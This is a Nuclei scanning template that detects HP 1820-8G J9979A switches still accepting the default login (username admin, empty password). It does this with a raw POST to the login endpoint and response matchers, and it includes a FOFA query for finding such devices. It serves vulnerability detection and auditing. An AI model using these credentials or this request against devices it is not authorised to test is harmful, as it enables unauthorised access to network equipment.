id: hp-switch-default-login

info:
  name: HP 1820-8G Switch J9979A Default Login
  author: pussycat0x
  severity: high
  description: HP 1820-8G Switch J9979A default admin login credentials were discovered.
  reference:
    - https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
    fofa-query: HP 1820-8G Switch J9979A
  tags: default-login,hp

http:
  - raw:
      - |
        POST /htdocs/login/login.lua HTTP/1.1
        Host: {{Hostname}}

        username={{username}}&password=

    payloads:
      username:
        - admin

    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - '"redirect": "/htdocs/pages/main/main.lsp"'
          - '"error": ""'

      - type: status
        status:
          - 200
# digest: 490a00463044022053f929db220793a00ce9294b2cf6e64f02b4c31a9f644414582e4f8c434b6eca022003478717cef149e0e42e12b60b4e41c56f18d5d084cd3be86c940265e4c026ed:922c64590222798bb761d5b6d8e72950